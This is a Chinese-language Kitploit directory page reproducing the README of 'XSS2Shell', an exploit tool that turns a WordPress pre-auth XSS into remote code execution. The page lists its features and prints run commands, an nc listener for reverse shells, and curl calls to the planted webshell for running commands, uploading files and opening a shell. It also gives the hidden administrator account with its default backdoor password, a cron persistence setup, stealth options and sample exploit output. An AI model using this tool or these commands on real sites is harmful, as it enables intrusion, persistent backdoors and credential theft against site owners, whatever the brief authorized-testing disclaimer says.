Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
XSS2Shell — 利用 WordPress 预认证 XSS(CVE-2026-64638)实现远程代码执行,安装 AES 加密的后门 WebShell,具备持久化、文件上传、反向 Shell 及隐蔽选项,适用于授权的红队演练。 | Kitploit
工具/GitHubGitHub/g0d150ne/xss2shell
持久化机制漏洞利用Web应用程序漏洞利用信息收集后渗透利用命令与控制红队远程访问工具Payload 开发
GitHubg0d150ne/xss2shell

XSS2Shell

利用 WordPress 预认证 XSS(CVE-2026-64638)实现远程代码执行,安装 AES 加密的后门 WebShell,具备持久化、文件上传、反向 Shell 及隐蔽选项,适用于授权的红队演练。

629天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
分享

XSS2Shell ULTIMATE v3.0

WordPress 预认证 XSS → RCE 漏洞利用链
由 G0D150NE 开发

📌 功能特性

  • 🔍 自动检测 XSS 与 WordPress 版本
  • 🎯 3 种模式:Auto、XSS、Direct
  • 📡 回调服务器(用于捕获凭据)
  • 🐚 支持多种执行方式的 WebShell
  • 🔄 持久化(cron 定时任务、隐藏管理员、自复制)
  • 📁 文件上传/下载
  • 🖥️ 一键反弹 Shell
  • 🛡️ 隐身模式(从插件列表中隐藏)
  • 🔐 AES-256 加密后门

📦 安装

root@kitploit:~
# Clone
git clone https://github.com/g0d150ne/XSS2Shell.git
cd XSS2Shell

# Install dependencies
pip3 install requests beautifulsoup4 cryptography

# Run
python3 poc.py -h

🚀 快速开始

1. 设置监听器

root@kitploit:~
# Open terminal for reverse shell
nc -lvnp 4444

2. 运行漏洞利用

自动模式(推荐)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --lhost 192.168.1.100

XSS 模式(无需凭据)

root@kitploit:~
python3 poc.py http://target.com --mode xss --lhost 192.168.1.100

直接模式(有凭据)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --mode direct --lhost 192.168.1.100

🔧 命令执行

WebShell 安装完成后:

root@kitploit:~
# Base64 encoded (recommended)
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?b2h='$(echo -n 'id' | base64)

# Plain command
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?cmd=whoami'

# Upload file
curl -F '[email protected]' http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php

# Reverse shell
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?rev=1'

🎯 使用示例

root@kitploit:~
# 1. Auto scan + exploit
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5

# 2. XSS chain without credentials
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5

# 3. Custom port & plugin name
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --lport 1337 --slug backdoor

# 4. Change backdoor password
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --backdoor-pass MySecretPass

# 5. Custom callback port
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5 --callback-port 9999

📝 命令选项

🐚 WebShell 功能

漏洞利用成功后:

已创建的隐藏管理员:

  • 用户名:sysadmin_{slug}
  • 密码:{backdoor-pass}(默认:G0D150NE)

📸 示例输出

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║  Target   : http://wordpress-site.com
║  Attacker : 192.168.1.100:4444
║  Plugin   : g0d150ne
║  Mode     : AUTO
╚══════════════════════════════════════════════════════════════════╝

[•] Detecting WordPress version...
[+] WordPress version: 6.7.0
[•] Testing XSS vulnerability...
[+] XSS vulnerable! Vector: <area id=ajaxurl...
[+] Login successful as admin
[+] Plugin uploaded successfully
[+] Webshell ready: http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
[+] Test: uid=33(www-data)

╔══════════════════════════════════════════════════════════════════╗
║  [+] EXPLOIT SUCCESSFUL                                          ║
╠══════════════════════════════════════════════════════════════════╣
║  WEBSHELL:                                                       ║
║    http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php    ║
║  ADMIN USER CREATED:                                             ║
║    Username: sysadmin_g0d150ne                                   ║
║    Password: G0D150NE                                            ║
╚══════════════════════════════════════════════════════════════════╝

🔧 故障排除

⚠️ 免责声明

仅供教育和授权测试使用。
仅可用于您拥有或已获得明确测试许可的系统。
作者对任何滥用或造成的损害不承担责任。

📞 联系方式

  • 作者:G0D150NE
  • CVE:CVE-2026-64638
root@kitploit:~
下载工具
选项说明默认值
target目标 WordPress URL必填
-u, --usernameWordPress 管理员用户名-
-p, --wp-passWordPress 管理员密码-
--lhost监听器 IP 地址127.0.0.1
--lport监听器端口4444
--mode漏洞利用模式(auto/xss/direct)auto
--slug插件 slug 名称g0d150ne
--callback-port回调服务器端口9090
--backdoor-pass后门密码G0D150NE
功能命令
执行命令?b2h=BASE64_CMD
上传文件-F '[email protected]'
反弹 Shell?rev=1
明文命令?cmd=id
加密后门?decrypt=AES_DATA
问题解决方法
ModuleNotFoundErrorpip3 install requests beautifulsoup4 cryptography
Connection refused检查监听器:nc -lvnp 4444
Login failed验证凭据或使用 XSS 模式
Plugin upload failed检查权限,使用不同的 slug
Argument conflict使用 -p 指定 wp-pass,使用 --backdoor-pass 指定后门密码